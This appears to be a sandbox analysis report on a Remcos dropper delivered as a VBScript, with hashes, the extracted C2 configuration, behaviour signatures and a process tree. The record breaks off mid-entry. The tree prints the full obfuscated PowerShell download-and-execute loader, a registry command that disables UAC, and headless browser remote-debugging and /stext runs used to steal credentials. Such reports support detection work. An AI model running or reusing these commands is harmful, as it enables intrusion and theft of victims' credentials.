Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/11/2024, 15:12

General

  • Target

    Solicitați comanda p78460.vbs

  • Size

    14KB

  • MD5

    c80bf6e7394bfdb6d31aef11b1e31b68

  • SHA1

    88b6b74da0a06427ec9e502378ea374cfdd0afea

  • SHA256

    36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753

  • SHA512

    0df5a54efc36aedae60888c7c241da206e9755db164a18e4bdd969bbd0b4b88b1b8474d6749ceba540d75c0b189964db3ff4989f6acf4f397b7a4642a52a92cf

  • SSDEEP

    192:4FbstrlpW7xBpgpnvxLPj8xNbBzLS+cr7rSF9rqQRiHu2lXU8sIOmfSZzx+Xn:SbO6pgpnvlk578WF9rfGSvn5kXn

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

6dp5nq4du.duckdns.org:2852

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    true

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-M09H81

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • UAC bypass 3 TTPs 1 IoCs
  • Detected Nirsoft tools 3 IoCs

    Free utilities often used by attackers which can steal passwords, product keys, etc.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Blocklisted process makes network request 13 IoCs
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 21 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Solicitați comanda p78460.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:640
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3284
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"
    1⤵
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4608
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4792
      • C:\Windows\SysWOW64\cmd.exe
        /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3160
        • C:\Windows\SysWOW64\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:2724
      • C:\Program Files\Google\Chrome\Application\Chrome.exe
        --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        3⤵
        • Uses browser remote debugging
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:548
        • C:\Program Files\Google\Chrome\Application\Chrome.exe
          "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcd979cc40,0x7ffcd979cc4c,0x7ffcd979cc58
          4⤵
            PID:1708
          • C:\Program Files\Google\Chrome\Application\Chrome.exe
            "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1940,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1936 /prefetch:2
            4⤵
              PID:748
            • C:\Program Files\Google\Chrome\Application\Chrome.exe
              "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2172,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2228 /prefetch:3
              4⤵
                PID:5088
              • C:\Program Files\Google\Chrome\Application\Chrome.exe
                "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2264,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2280 /prefetch:8
                4⤵
                  PID:2884
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3200,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3940
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3208,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3272 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:3448
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4600,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:1
                  4⤵
                  • Uses browser remote debugging
                  PID:640
                • C:\Program Files\Google\Chrome\Application\Chrome.exe
                  "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4716,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8
                  4⤵
                    PID:1772
                  • C:\Program Files\Google\Chrome\Application\Chrome.exe
                    "C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4744,i,11528743640745338059,16546721480664124138,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4868 /prefetch:8
                    4⤵
                      PID:2864
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\aeagtpivekovlnzjj"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3704
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\cgnruitossgawtnntlru"
                    3⤵
                    • Accesses Microsoft Outlook accounts
                    • System Location Discovery: System Language Discovery
                    PID:4940
                  • C:\Windows\SysWOW64\msiexec.exe
                    C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\natjvseqoayfyabrkwmwrkxq"
                    3⤵
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2356
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
                    3⤵
                    • Uses browser remote debugging
                    • Enumerates system info in registry
                    • Modifies registry class
                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                    • Suspicious use of FindShellTrayWindow
                    PID:3880
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ffcca6546f8,0x7ffcca654708,0x7ffcca654718
                      4⤵
                        PID:1600
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
                        4⤵
                          PID:1552
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2020,10989294543221847008,2873214528730484201,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2512 /prefetch:3
                          4⤵
                            PID:4224
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
